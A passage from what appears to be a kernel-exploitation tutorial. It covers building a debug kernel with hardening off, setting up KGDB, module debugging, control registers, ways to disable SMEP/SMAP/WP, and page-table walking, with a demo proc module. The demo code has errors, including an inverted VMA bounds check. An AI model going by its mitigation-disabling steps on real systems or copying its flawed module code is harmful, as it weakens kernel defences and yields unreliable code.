---> printk and dmesg options ---> [X] Compile-time checks and compiler options ---> ... [*] Compile the kernel with debug info ... ... -*- Kernel debugging ... [*] KGDB: kernel debugger Do you wish to save your new configuration? Press <ESC><ESC> to continue kernel configuration. [< Yes >] < No > Make sure you do have similiar lines on .config: CONFIG_STRICT_KERNEL_RWX=n CONFIG_DEBUG_INFO=y CONFIG_HAVE_HARDENED_USERCOPY_ALLOCATOR=n CONFIG_HARDENED_USERCOPY=n CONFIG_HARDENED_USERCOPY_FALLBACK=n Before starting the compiling process, to faster the process, you can split the work to multiple jobs(on different processors). nproc would hand you the number of processing units available. root@Nwwz:/usr/src/linux-4.17.2# nproc 4 root@Nwwz:/usr/src/linux-4.17.2# make -j4 It will then automatically go through stage 1 & 2: Setup is 17116 bytes (padded to 17408 bytes). System is 4897 kB CRC 2f571cf0 Kernel: arch/x86/boot/bzImage is ready (#1) Building modules, stage 2. MODPOST 3330 modules (SNIP) CC virt/lib/irqbypass.mod.o LD [M] virt/lib/irqbypass.ko root@Nwwz:/usr/src/linux-4.17.2# If somehow, there’s no stage two, a single command should be executed before moving on: (This normally isn’t required.) make modules Installing the modules: root@Nwwz:/usr/src/linux-4.17.2# make modules_install (SNIP) INSTALL sound/usb/usx2y/snd-usb-usx2y.ko INSTALL virt/lib/irqbypass.ko DEPMOD 4.17.0 root@Nwwz:/usr/src/linux-4.17.2# Installing and preparing the kernel for boot: root@Nwwz:/usr/src/linux-4.17.2# make install (SNIP) Found linux image: /boot/vmlinuz-4.17.0 Found initrd image: /boot/initrd.img-4.17.0 Found linux image: /boot/vmlinuz-4.9.0-6-amd64 Found initrd image: /boot/initrd.img-4.9.0-6-amd64 done root@Nwwz:/usr/src/linux-4.17.2# cd /boot root@Nwwz:/boot# mkinitramfs -o /boot/initrd.img-4.17.0 4.17.0 root@Nwwz:/boot# reboot You can then choose the new kernel from the boot screen: *Debian GNU/Linux, with Linux 4.17.0 Debian GNU/Linux, with Linux 4.17.0 (recovery mode) Debian GNU/Linux, with Linux 4.9.0-6-amd64 Debian GNU/Linux, with Linux 4.9.0-6-amd64 (recovery mode) If it fails however, saying that it’s an out-of-memory problem, you can reduce the size of the boot image. root@Nwwz:/boot# cd /lib/modules/4.17.0/ root@Nwwz:/lib/modules/4.17.0# find . -name *.ko -exec strip --strip-unneeded {} + root@Nwwz:/lib/modules/4.17.0# cd /boot root@Nwwz:/boot# mkinitramfs -o initrd.img-4.17.0 4.17.0 It’ll then boot successfully. root@Nwwz:~# uname -r 4.17.0 Using KGDB to debug the kernel: Installing ifconfig and running it would be the first thing to do: root@Nwwz:~# apt-get install net-tools (SNIP) root@Nwwz:~# ifconfig ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.150.145 netmask 255.255.255.0 broadcast 192.168.150.255 (SNIP) Back to Debian machine, transfering vmlinux to the host is done with SCP or WinSCP in my case. root@Nwwz:~# service ssh start .. Répertoire parent vmlinux 461 761 KB Fichier With this, you’ll have debug symbols ready, but you still need to enable KGDB for the target kernel. root@Nwwz:~# cd /boot/grub root@Nwwz:/boot/grub# nano grub.cfg Editing a single line, adding __setup arguments, we would then be able to manipulate the kernel for our needs, such as disabling KASLR and enabling KGDB. Search for the first ‘Debian GNU’ occurence and make sure it’s the wanted kernel, and add the following to the line starting with [X]: kgdboc=ttyS1,115200 kgdbwait nokaslr. menuentry 'Debian GNU/Linux' --class debian --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-simple-b1a66d11-d729-4f23-99b0-4ddfea0af6c5' { ... echo 'Loading Linux 4.17.0 ...' [X] linux /boot/vmlinuz-4.17.0 root=UUID=b1a66d11-d729-4f23-99b0-4ddfea0af6c5 ro quiet kgdboc=ttyS1,115200 kgdbwait nokaslr echo 'Loading initial ramdisk ...' initrd /boot/initrd.img-4.17.0 } In order to debug the running kernel, another VM similer to the one made previously(Debian) will be created(Debian HOST). Now shutdown both VMs in order to set the pipe: Debian: ⦿ Use named pipe: *---------------------------------------* | \\.\pipe\com_2 | *---------------------------------------* [This end is the server. [▼]] [The other end is a virtual machine. [▼]] ---------------------------------------------7 I/O mode ⧆ Yield CPU on poll Allow the guest operating system to use this serial port in polled mode (as opposed to interrupt mode). DebianHOST: ⦿ Use named pipe: *---------------------------------------* | \\.\pipe\com_2 | *---------------------------------------* [This end is the client. [▼]] [The other end is a virtual machine. [▼]] ---------------------------------------------7 I/O mode ⧆ Yield CPU on poll Allow the guest operating system to use this serial port in polled mode (as opposed to interrupt mode). Getting the vmlinux image to DebianHOST after installing necessary packages: root@Nwwz:~# apt-get install gcc gdb git net-tools root@Nwwz:~# cd /home/user root@Nwwz:/home/user# ls vmlinux root@Nwwz:/home/user# gdb vmlinux GNU gdb (Debian 7.12-6) 7.12.0.20161007-git (SNIP) Turning the Debian back on would result in a similiar message: KASLR disabled: 'nokaslr' on cmdline. [ 1.571915] KGDB: Waiting for connection from remote gdb... Attaching to DebianHOST’s GDB is then possible: (gdb) set serial baud 115200 (gdb) target remote /dev/ttyS1 Remote debugging using /dev/ttyS1 kgdb_breakpoint () at kernel/debug/debug_core.c:1073 1073 wmb(); /* Sync point after breakpoint */ (gdb) list 1068 noinline void kgdb_breakpoint(void) 1069 { 1070 atomic_inc(&kgdb_setting_breakpoint); 1071 wmb(); /* Sync point before breakpoint */ 1072 arch_kgdb_breakpoint(); 1073 wmb(); /* Sync point after breakpoint */ 1074 atomic_dec(&kgdb_setting_breakpoint); 1075 } 1076 EXPORT_SYMBOL_GPL(kgdb_breakpoint); 1077 (gdb) Know that by writing ‘continue’ on GDB, you wouldn’t be able to control it again unless you use the magic SysRq key to force a SIGTRAP to happen: root@Nwwz:~# echo "g" > /proc/sysrq-trigger And you can see in DebianHOST that it works. (SNIP) [New Thread 459] [New Thread 462] [New Thread 463] [New Thread 476] [New Thread 485] [New Thread 487] Thread 56 received signal SIGTRAP, Trace/breakpoint trap. [Switching to Thread 489] kgdb_breakpoint () at kernel/debug/debug_core.c:1073 1073 wmb(); /* Sync point after breakpoint */ (gdb) Compiling a simple module: A simple Hello 0x00sec module would be created. We need to make a directory in root folder, and prepare two files: root@Nwwz:~# mkdir mod root@Nwwz:~# cd mod root@Nwwz:~/mod/# nano hello.c #include <linux/init.h> #include <linux/module.h> static void hello_exit(void){ printk(KERN_INFO "Goodbye!\n"); } static int hello_init(void){ printk(KERN_INFO "Hello 0x00sec!\n"); return 0; } MODULE_LICENSE("GPU"); module_init(hello_init); module_exit(hello_exit); root@Nwwz:~/mod/# nano Makefile obj-m += hello.o KDIR = /lib/modules/$(shell uname -r)/build all: make -C $(KDIR) M=$(PWD) modules clean: rm -rf *.ko *.o *.mod.* *.symvers *.order Then, one can start compiling using ‘make’ and insert/remove the module in kernel to trigger both init and exit handlers. root@Nwwz:~/mod# make make -c /lib/modules/4.17.0/build M=/root/mod modules make[1]: Entering directory '/usr/src/linux-4.17.2' CC [M] /root/mod/hello.o Building modules, stage 2. MODPOST 1 modules CC /root/mod/hello.mod.o LD [M] /root/mod/hello.ko make[1]: Leaving directory '/usr/src/linux-4.17.2' root@Nwwz:~/mod# insmod hello.ko root@Nwwz:~/mod# rmmod hello.ko The messages would be by then saved in the dmesg circular buffer. root@Nwwz:~/mod# dmesg | grep Hello [ 6545.039487] Hello 0x00sec! root@Nwwz:~/mod# dmesg | grep Good [ 6574.452282] Goodbye! To clean the current directory: root@Nwwz:~/mod# make clean What?: The kernel doesn’t count on the C library we’ve been used to, because it’s judged useless for it. So instead, after the module is linked and loaded in kernel-space(requires root privileges, duh). It can use header files available in the kernel source tree, which offers a huge number of functions such as printk() which logs the message and sets it’s priority, module_init() and module_exit() to declare initialization and clean-up functions. And while application usually run with no chance of changing their variables by another thread. This certainly isn’t the case for LKMs, since what they offer could be used by multiple processes at a single time, which could lead(if the data dealt with is sensible, aka in critical region) to a panic, or worse(better?), a compromise. Few structs: The kernel implements multiple locks, only semaphores and spinlocks will likely be used here. When the semaphore is previously held, the thread will sleep, waiting for the lock to be released so he can claim it. That’s why it’s a sleeping lock, therefore, it’s only used in process context. /* Please don't access any members of this structure directly */ struct semaphore { raw_spinlock_t lock; unsigned int count; struct list_head wait_list; }; It can then be initialized with sema_init() or DEFINE_SEMAPHORE(): #define __SEMAPHORE_INITIALIZER(name, n) \ { \ .lock = __RAW_SPIN_LOCK_UNLOCKED((name).lock), \ .count = n, \ .wait_list = LIST_HEAD_INIT((name).wait_list), \ } static inline void sema_init(struct semaphore *sem, int val) { static struct lock_class_key __key; *sem = (struct semaphore) __SEMAPHORE_INITIALIZER(*sem, val); lockdep_init_map(&sem->lock.dep_map, "semaphore->lock", &__key, 0); } With val being the much processes that can hold the lock at once. It’s normally set to 1, and a semaphore with a count of 1 is called a mutex. Another type of locks would be spinlocks, it keeps the thread spinning instead of sleeping, for that reason, it can be used in the interrupt context. typedef struct spinlock { union { struct raw_spinlock rlock; #ifdef CONFIG_DEBUG_LOCK_ALLOC # define LOCK_PADSIZE (offsetof(struct raw_spinlock, dep_map)) struct { u8 __padding[LOCK_PADSIZE]; struct lockdep_map dep_map; }; #endif }; } spinlock_t; #define __RAW_SPIN_LOCK_INITIALIZER(lockname) \ { \ .raw_lock = __ARCH_SPIN_LOCK_UNLOCKED, \ SPIN_DEBUG_INIT(lockname) \ SPIN_DEP_MAP_INIT(lockname) } #define __RAW_SPIN_LOCK_UNLOCKED(lockname) \ (raw_spinlock_t) __RAW_SPIN_LOCK_INITIALIZER(lockname) # define raw_spin_lock_init(lock) \ do { *(lock) = __RAW_SPIN_LOCK_UNLOCKED(lock); } while (0) #endif static __always_inline raw_spinlock_t *spinlock_check(spinlock_t *lock) { return &lock->rlock; } #define spin_lock_init(_lock) \ do { \ spinlock_check(_lock); \ raw_spin_lock_init(&(_lock)->rlock); \ } while (0) Enough with locks, what about file_operations? This struct holds the possible operations that can be called on a device/file/entry. When creating a character device by directly calling cdev_alloc() or misc_register(), it has to be provided along with the major(on first function only) and minor. It is defined as follows: struct file_operations { struct module *owner; loff_t (*llseek) (struct file *, loff_t, int); ssize_t (*read) (struct file *, char __user *, size_t, loff_t *); ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *); ... } __randomize_layout; There are similiar structs too, such as inode_operations, block_device_operations and tty_operations… But they all provide handlers to userspace function if the file/inode/blockdev/tty is the target. These are sometimes used by the attacker in order to redirect execution such as perf_fops or ptmx_fops. The kernel provides some structs for lists with different search times. The first being double linked-list, list_head, it’s definition is simple, pointing to the next and previous list_head. struct list_head { struct list_head *next, *prev; }; While the second is redblack tree, rb_node, provides better search time. struct rb_node { unsigned long __rb_parent_color; struct rb_node *rb_right; struct rb_node *rb_left; } __attribute__((aligned(sizeof(long)))); It can be used to find the target value faster, if it’s bigger than the first node(head), then go right, else, go left. Function container_of() can then be used to extract the container struct. Note: Each device, can have multiple minors, but it’ll necessarily have a single major. root@Nwwz:/# cd /dev root@Nwwz:/dev# ls -l total 0 crw------- 1 root root [10], 175 Feb 9 09:24 agpgart | *-> Same major, different minors. | crw-r--r-- 1 root root [10], 235 Feb 9 09:24 autofs drwxr-xr-x 2 root root 160 Feb 9 09:24 block drwxr-xr-x 2 root root 80 Feb 9 09:24 bsg (SNIP) [c]rw-rw-rw- 1 root tty [5], [2] Feb 9 12:06 ptmx | | | | | *--> Minor *---> Character Device *---> Major (SNIP) [b]rw-rw---- 1 root cdrom [11], [0] Feb 9 09:24 sr0 | | | | | *--> Minor *---> Block Device *---> Major (SNIP) Debug a module: When we started gdb, the only image it was aware of, is the vmlinux one. It doesn’t know about the loaded module, and doesn’t know about the load location. In order to provide these things and make debugging the module possible, one has to first transfer the target module to DebianHOST. root@Nwwz:~/mod# service ssh start Once that’s done, one should find different sections and addresses of the LKM in memory: root@Nwwz:~/mod# insmod simple.ko root@Nwwz:~/mod# cd /sys/module/simple/sections root@Nwwz:/sys/module/simple/sections# ls -la total 0 drwxr-xr-x 2 root root 0 Aug 11 06:30 . drwxr-xr-x 5 root root 0 Aug 2 17:55 .. -r-------- 1 root root 4096 Aug 11 06:31 .bss -r-------- 1 root root 4096 Aug 11 06:31 .data -r-------- 1 root root 4096 Aug 11 06:31 .gnu.linkonce.this_module -r-------- 1 root root 4096 Aug 11 06:31 __mcount_loc -r-------- 1 root root 4096 Aug 11 06:31 .note.gnu.build-id -r-------- 1 root root 4096 Aug 11 06:31 .orc_unwind -r-------- 1 root root 4096 Aug 11 06:31 .orc_unwind_ip -r-------- 1 root root 4096 Aug 11 06:31 .rodata.str1.1 -r-------- 1 root root 4096 Aug 11 06:31 .rodata.str1.8 -r-------- 1 root root 4096 Aug 11 06:31 .strtab -r-------- 1 root root 4096 Aug 11 06:31 .symtab -r-------- 1 root root 4096 Aug 11 06:31 .text root@Nwwz:/sys/module/simple/sections# cat .text 0xffffffffc054c000 root@Nwwz:/sys/module/simple/sections# cat .data 0xffffffffc054e000 root@Nwwz:/sys/module/simple/sections# cat .bss 0xffffffffc054e4c0 Back to DebianHOST and in gdb: (gdb) add-symbol-file simple.ko 0xffffffffc054c000 -s .data 0xffffffffc054e000 -s .bss 0xffffffffc054e4c0 And that’s it. Chapter II: Overview on security and General understanding “Uuuuh, it’s simple?” Control Registers: CRs are special registers, being invisible to the user, they hold important information on the current CPU and the process running on it. x86_32 and x86_64: Keep in mind that their sizes are different(64bit for x86_64, 32bit for x86_32). CR0: x32 and x64: #0: PE(Protected Mode Enable) #1: MP(Monitor co-processor) #2: EM(Emulation) #3: TS(Task Switched) #4: ET(Extension Type) #5: NE(Numeric Error) #6-15: Reserved #16: WP(Write Protect) #17: Reserved #18: AM(Alignment Mask) #19-28: Reserved #29: NW(Not-Write Through) #30: CD(Cache Disable) #31: PG(Paging) x64 only: #32-61: Reserved CR2: Solely containing the PFLA(Page Fault Linear Address) address, which would later be extracted using do_page_fault function and passed to __do_page_fault to handle it. dotraplinkage void notrace do_page_fault(struct pt_regs *regs, unsigned long error_code) { unsigned long address = read_cr2(); /* Get the faulting address */ enum ctx_state prev_state; prev_state = exception_enter(); if (trace_pagefault_enabled()) trace_page_fault_entries(address, regs, error_code); __do_page_fault(regs, error_code, address); exception_exit(prev_state); } NOKPROBE_SYMBOL(do_page_fault); CR3: This register contains the physical address of the current process PGD(Page Global Directory), which(once converted back to virtual address) would link to the next level(P4D on five-level page tables or PUD on four-level page tables), but in the end, it’s all to find the same struct, that is, struct page. static inline unsigned long read_cr3_pa(void) { return __read_cr3() & CR3_ADDR_MASK; } static inline unsigned long native_read_cr3_pa(void) { return __native_read_cr3() & CR3_ADDR_MASK; } static inline void load_cr3(pgd_t *pgdir) { write_cr3(__sme_pa(pgdir)); } This is called as an example when an Oops happens, and the kernel calls dump_pagetable(). CR4: x32 and x64: #0: VME(Virtual-8086 Mode Extensions) #1: PVI(Protected Mode Virtual Interrupts) #2: TSD(Time Stamp Disable) #3: DE(Debugging Extensions) #4: PSE(Page Size Extensions) #5: PAE(Physical Address Extensions) #6: MCE(Machine Check Enable) #7: PGE(Page Global Enable) #8: PCE(Performance-Monitoring Counter Enable) #9: OSFXSR(OS Support for FXSAVE and FXRSTOR Instructions) #10: OSXMMEXCPT(OS Support for Unmasked SIMD Floating Point Exceptions) #11: UMIP(User-Mode Instruction Prevention) #12: Reserved #13: VMXE(Virtual Machine Extensions Enable) #14: SMXE(Safer Mode Extensions Enable) #15-16: Reserved #17: PCIDE(PCID Enable) #18: OSXSAVE(XSAVE and Processor Extended States Enable) #19: Reserved #20: SMEP(Supervisor Mode Execution Prevention) #21: SMAP(Supervisor Mode Access Prevention) #22-31: Reserved x64 only: #31-63: Reserved CR1 and CR5 to CR7: Marked as reserved, accessing them would result in raising the Undefined Behavior(#UD) exception. x86_64 only: CR8: Only the first 4 bits are used in this one, while the other 60 bits are reserved(0). Also called TPR(Task Priority Register). Those 4 bits are used when servicing interrupts, checking if the task should really be interrupted. It may or may not, depending on the interrupt’s priority: (IP <= TP ? PASS:SERVICE). They differ from architecture to another, while the previous example reviewed two CISC(x86_32, x86_64). Windows itself does have much similiarities at this level: image.png838x489 28.3 KB The thing is a little bit more different in RISC(ARM for this example): Instead of Control Registers, they are named Coprocessors(P0 to P15), each Coprocessor holds 16 registers(C0 to C15). Note however, that only CP14 and CP15 are very important to the system. MCR and MRC Instructions are available to deal with data transfer(read/write). An example for the TTBR(Translation Table Base Register) is as follows: image.png732x31 10.1 KB SMAP: Stands for Supervisor Mode Access Prevention, as it’s name suggests, prevents access to user-space from a more privileged context, that is, ring zero. However, since access may still be necessary in certain occasions, a flag is dedicated(AC in EFLAGS) to this purpose, along with two instructions to set or clear it: CLAC: image.png906x109 29.2 KB STAC: image.png890x111 29.3 KB static __init int setup_disable_smap(char *arg) { setup_clear_cpu_cap(X86_FEATURE_SMAP); return 1; } __setup("nosmap", setup_disable_smap); It can be disabled with nosmap boot flag, which would clear the CPU’s SMAP capability, or by unsetting the SMAP bit(#21) on CR4. SMEP: An abbreviation for Supervisor Mode Execution Prevention, when running on ring zero, execution would not be allowed to be transmitted to user-space. So both SMEP and SMAP put a form of limitation on the attacker’s surface. static __init int setup_disable_smep(char *arg) { setup_clear_cpu_cap(X86_FEATURE_SMEP); check_mpx_erratum(&boot_cpu_data); return 1; } __setup("nosmep", setup_disable_smep); Knowing if it’s on is as simple as checking /proc/cpuinfo, and it’s the same for SMAP. This protection can be disabled with nosmep boot flag, it can also be disabled during runtime by unsetting SMEP bit(#20) on CR4. Write-Protect: Since code executing at the highest level of privilege should normally be capable of writting to all pages even those marked as RO(Read Only). However, a bit in CR0(WP bit(16th)) is supposed to stop that from happening, by providing additional checks. Paging(a bit of segmentation too): Linux does separate privileges. the processor can handle up to 4 different rings, starting from 0 which obviously is the most privileged and ending with 3 being the least privileged with limited access to system resources. However, most operating systems do work with only two rings, zero(also called kernel-space) and three(or user-space). Each running process does have a struct mm_struct which fully describes it’s virtual memory space. But when it comes to segmentation and paging, we’re only interested in few objects in this struct: context, the single-linked list mmap and pgd. typedef struct { u64 ctx_id; atomic64_t tlb_gen; #ifdef CONFIG_MODIFY_LDT_SYSCALL struct rw_semaphore ldt_usr_sem; struct ldt_struct *ldt; #endif #ifdef CONFIG_X86_64 unsigned short ia32_compat; #endif struct mutex lock; void __user *vdso; const struct vdso_image *vdso_image; atomic_t perf_rdpmc_allowed; #ifdef CONFIG_X86_INTEL_MEMORY_PROTECTION_KEYS u16 pkey_allocation_map; s16 execute_only_pkey; #endif #ifdef CONFIG_X86_INTEL_MPX void __user *bd_addr; #endif } mm_context_t; This struct holds many information on the context, including the Local descriptor table(LDT), the VDSO image and base address(residing in user-space __user), a read/write semaphore and a mutual exclusion lock(it’s a semaphore too, remember?). struct ldt_struct { struct desc_struct *entries; unsigned int nr_entries; int slot; }; The first element in the LDT is a desc_struct pointer, referencing an array of entries, nr_entries of them. However, know that LDT isn’t usually set up, it would only use the Global Descriptor Table, it’s enough for most processes. DEFINE_PER_CPU_PAGE_ALIGNED(struct gdt_page, gdt_page) = { .gdt = { #ifdef CONFIG_X86_64 [GDT_ENTRY_KERNEL32_CS] = GDT_ENTRY_INIT(0xc09b, 0, 0xfffff), [GDT_ENTRY_KERNEL_CS] = GDT_ENTRY_INIT(0xa09b, 0, 0xfffff), [GDT_ENTRY_KERNEL_DS] = GDT_ENTRY_INIT(0xc093, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER32_CS] = GDT_ENTRY_INIT(0xc0fb, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_DS] = GDT_ENTRY_INIT(0xc0f3, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_CS] = GDT_ENTRY_INIT(0xa0fb, 0, 0xfffff), #else [GDT_ENTRY_KERNEL_CS] = GDT_ENTRY_INIT(0xc09a, 0, 0xfffff), [GDT_ENTRY_KERNEL_DS] = GDT_ENTRY_INIT(0xc092, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_CS] = GDT_ENTRY_INIT(0xc0fa, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_DS] = GDT_ENTRY_INIT(0xc0f2, 0, 0xfffff), [GDT_ENTRY_PNPBIOS_CS32] = GDT_ENTRY_INIT(0x409a, 0, 0xffff), [GDT_ENTRY_PNPBIOS_CS16] = GDT_ENTRY_INIT(0x009a, 0, 0xffff), [GDT_ENTRY_PNPBIOS_DS] = GDT_ENTRY_INIT(0x0092, 0, 0xffff), [GDT_ENTRY_PNPBIOS_TS1] = GDT_ENTRY_INIT(0x0092, 0, 0), [GDT_ENTRY_PNPBIOS_TS2] = GDT_ENTRY_INIT(0x0092, 0, 0), [GDT_ENTRY_APMBIOS_BASE] = GDT_ENTRY_INIT(0x409a, 0, 0xffff), [GDT_ENTRY_APMBIOS_BASE+1] = GDT_ENTRY_INIT(0x009a, 0, 0xffff), [GDT_ENTRY_APMBIOS_BASE+2] = GDT_ENTRY_INIT(0x4092, 0, 0xffff), [GDT_ENTRY_ESPFIX_SS] = GDT_ENTRY_INIT(0xc092, 0, 0xfffff), [GDT_ENTRY_PERCPU] = GDT_ENTRY_INIT(0xc092, 0, 0xfffff), GDT_STACK_CANARY_INIT #endif } }; EXPORT_PER_CPU_SYMBOL_GPL(gdt_page); A per-cpu variable gdt_page is initialized using the GDT_ENTRY_INIT macro. #define GDT_ENTRY_INIT(flags, base, limit) \ { \ .limit0 = (u16) (limit), \ .limit1 = ((limit) >> 16) & 0x0F, \ .base0 = (u16) (base), \ .base1 = ((base) >> 16) & 0xFF, \ .base2 = ((base) >> 24) & 0xFF, \ .type = (flags & 0x0f), \ .s = (flags >> 4) & 0x01, \ .dpl = (flags >> 5) & 0x03, \ .p = (flags >> 7) & 0x01, \ .avl = (flags >> 12) & 0x01, \ .l = (flags >> 13) & 0x01, \ .d = (flags >> 14) & 0x01, \ .g = (flags >> 15) & 0x01, \ } This macro simply takes three arguments, and splits them in order to store at each field a valid value. The GDT holds more entries on 32bit than on 64bit. struct gdt_page { struct desc_struct gdt[GDT_ENTRIES]; } __attribute__((aligned(PAGE_SIZE))); Says that gdt_page is an array of GDT_ENTRIES(32 on x86_32, 16 on x86_64) much of desc_struct aligned to PAGE_SIZE(usually 4KB(4096)). struct desc_struct { u16 limit0; u16 base0; u16 base1: 8, type: 4, s: 1, dpl: 2, p: 1; u16 limit1: 4, avl: 1, l: 1, d: 1, g: 1, base2: 8; } __attribute__((packed)); When an ELF is about to run, and is being loaded with load_elf_binary(), it does call setup_new_exec(), install_exec_creds() on bprm before it calls setup_arg_pages() which would pick a random stack pointer. Before returning successfully, it would call finalize_exec() and start_thread() which would update the stack’s rlimit and begin execution respectively: void start_thread(struct pt_regs *regs, unsigned long new_ip, unsigned long new_sp) { start_thread_common(regs, new_ip, new_sp, __USER_CS, __USER_DS, 0); } EXPORT_SYMBOL_GPL(start_thread); As you are able to see, this function is just a wrapper around start_thread_common(): static void start_thread_common(struct pt_regs *regs, unsigned long new_ip, unsigned long new_sp, unsigned int _cs, unsigned int _ss, unsigned int _ds) { WARN_ON_ONCE(regs != current_pt_regs()); if (static_cpu_has(X86_BUG_NULL_SEG)) { loadsegment(fs, __USER_DS); load_gs_index(__USER_DS); } loadsegment(fs, 0); loadsegment(es, _ds); loadsegment(ds, _ds); load_gs_index(0); regs->ip = new_ip; regs->sp = new_sp; regs->cs = _cs; regs->ss = _ss; regs->flags = X86_EFLAGS_IF; force_iret(); } As a conclusion, every process starts with default segment registers, but different GPRs, stack and instruction pointer, and by looking at __USER_DS and __USER_CS: #define GDT_ENTRY_DEFAULT_USER_DS 5 #define GDT_ENTRY_DEFAULT_USER_CS 6 #define __USER_DS (GDT_ENTRY_DEFAULT_USER_DS*8 + 3) #define __USER_CS (GDT_ENTRY_DEFAULT_USER_CS*8 + 3) We would find the segment registers and their values on user-space: Initial state: CS = 6*8+3 = 0x33 SS = 5*8+3 = 0x2b DS = FS = ES = 0 These values can be checked using GDB and a dummy binary. (gdb) b* main Breakpoint 1 at 0x6b0 (gdb) r Starting program: /root/mod/cs Breakpoint 1, 0x00005555555546b0 in main () (gdb) info reg cs ss cs 0x33 51 ss 0x2b 43 Also, you should know that, CS holds in it’s least 2 significant bits, the Current Privilege Level(CPL), other segment selectors hold the Requested Privilege Level(RPL) instead of CPL. (gdb) p/t $cs $1 = 110011 (gdb) p/x $cs & 0b11 $2 = 0x3 # (Privilege Level: User(3) SuperUser(0)) (gdb) p/d $cs & ~0b1111 $3 = 48 # (Table Offset: 48) (gdb) p/d $cs & 0b100 $4 = 0 # (Table Indicator: GDT(0) LDT(1)) 3 stands for the third ring, least privileged, that is, user-space. It doesn’t change, unless the execution is in kernel-space, so it’s similiar for both root and any normal user. So both RPL and CPL could be considered a form of limitation when accessing segments with lower(more privileged) DPL(Descriptor Privilege Level). When it comes to paging, it’s equivalent bit in CR0(#31) is only set when the system is running in protected mode(PE bit in CR0 is set), because in real mode, virtual address are equal to physical ones. Linux moved from four-level page tables to support five-level page tables by adding an additional layer(P4D), so the levels now are: PGD P4D PUD PMD PTE. PGD is the first level Page Global Directory, it is a pointer of type pgd_t, and it’s definition is: typedef struct { pgdval_t pgd; } pgd_t; It holds a pgdval_t inside, which is an unsigned long(8 bytes on x86_64, 4 on x86_32😞 typedef unsigned long pgdval_t; To get to the next level, pagetable_l5_enabled() is called to check if the CPU has X86_FEATURE_LA57 enabled. #define pgtable_l5_enabled() cpu_feature_enabled(X86_FEATURE_LA57) This can be seen in p4d_offset(): static inline p4d_t *p4d_offset(pgd_t *pgd, unsigned long address) { if (!pgtable_l5_enabled()) return (p4d_t *)pgd; return (p4d_t *)pgd_page_vaddr(*pgd) + p4d_index(address); } If it isn’t enabled, it simply casts the pgd_t * as p4d_t * and returns it, otherwise it returns the P4D entry within the PGD that links to the specific address. Then P4D itself can be used to find the next level, which is PUD of type pud_t *, PUD links to PMD(Page Middle Directory) and PMD to the PTE(Page Table Entry) which is the last level, and contains the physical address of the page with some protection flags and is of type pte_t *. Each process has it’s own virtual space(mm_struct, vm_area_struct and pgd_t). struct vm_area_struct { unsigned long vm_start; unsigned long vm_end; struct vm_area_struct *vm_next, *vm_prev; struct rb_node vm_rb; unsigned long rb_subtree_gap; struct mm_struct *vm_mm; pgprot_t vm_page_prot; unsigned long vm_flags; struct { struct rb_node rb; unsigned long rb_subtree_last; } shared; struct list_head anon_vma_chain; struct anon_vma *anon_vma; const struct vm_operations_struct *vm_ops; unsigned long vm_pgoff; struct file * vm_file; void * vm_private_data; atomic_long_t swap_readahead_info; #ifndef CONFIG_MMU struct vm_region *vm_region; #endif #ifdef CONFIG_NUMA struct mempolicy *vm_policy; #endif struct vm_userfaultfd_ctx vm_userfaultfd_ctx; } __randomize_layout; typedef struct { pgdval_t pgd; } pgd_t; So creating a new process would be very expensive on performance. Copy-on-Write(COW) comes in helpful here, by making a clone out of the parent process and only copying when a write happens to the previously marked read-only pages. This happens on fork and more specifically in copy_process(), which duplicates the task_struct and does specific operations depending on flags passed to clone(), before copying all parent information which includes credentials, filesystem, files, namespaces, IO, Thread Local Storage, signal, address space. As an example, this walks VMAs in search of a user specified address, once found, it gets its Physical address and Flags by walking page tables. #include <linux/module.h> #include <linux/kernel.h> #include <linux/proc_fs.h> #include <linux/sched.h> #include <linux/uaccess.h> #include <asm/pgtable.h> #include <linux/highmem.h> #include <linux/slab.h> #define device_name "useless" #define SET_ADDRESS 0x00112233 char *us_buf; unsigned long address = 0; long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ switch(cmd){ case SET_ADDRESS: address = arg; return 0; default: return -EINVAL; } } ssize_t do_read(struct file *filp, char *buf, size_t count, loff_t *offp){ int res, phys, flags; struct vm_area_struct *cmap; pgd_t *pgd; p4d_t *p4d; pud_t *pud; pmd_t *pmd; pte_t *ptep; /* Find corresponding VMA */ cmap = current->mm->mmap; while(1){ if(cmap->vm_start >= address && address < cmap->vm_end){ break; } cmap = cmap->vm_next; if(cmap == NULL){ return -1; } }; /* Walking Page-tables for fun */ pgd = pgd_offset(current->mm, address); p4d = p4d_offset(pgd, address); pud = pud_offset(p4d, address); pmd = pmd_offset(pud, address); ptep = pte_offset_kernel(pmd, address); phys = *((int *) ptep); flags = phys & 0xfff; phys &= ~0xfff; snprintf(us_buf, 64, "PhysAddr(%x) VMAStart(%lx) Flags(%x)", phys, cmap->vm_start, flags); if(count > 64) count = 64; res = copy_to_user(buf, us_buf, count); return res; } struct file_operations fileops = { .owner = THIS_MODULE, .read = do_read, .unlocked_ioctl = do_ioctl, }; static int us_init(void){ struct proc_dir_entry *res; us_buf = kmalloc(64, GFP_KERNEL); if(us_buf == NULL){ printk(KERN_ERR "Couldn't reserve memory."); return -ENOMEM; } res = proc_create(device_name, 0, NULL, &fileops); if(res == NULL){ printk(KERN_ERR "Failed allocating a proc entry."); return -ENOMEM; } return 0; } static void us_exit(void){ remove_proc_entry(device_name, NULL); kfree(us_buf); } MODULE_LICENSE("GPU"); module_init(us_init); module_exit(us_exit); To communicate with this proc entry, the following was written: #include <stdio.h> #include <string.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #define device_path "/proc/useless" #define SET_ADDRESS 0x00112233 void main(void){ int fd; char *ok; char c[64]; fd = open(device_path, O_RDONLY); ok = malloc(512); memcpy(ok, "Welp", sizeof(int )); ioctl(fd, SET_ADDRESS, ok); read(fd, c, sizeof( c)); printf("%s\n", &c); } This gives: 0x867 in binary is: 100001100111. Present: 1 (The page is present) R/W: 1 (The page have both read and write permissions) U/S: 1 (The page can be accessed by the user and supervisor) 00 Accessed: 1 (Set if the page had been accessed) Dirty: 1 (Set if the page was written to since last writeback) 0000 Note that necessary checks on validity of return values was ignored in this example, these could be performed with p??_none() and p??_present(), and multiple other 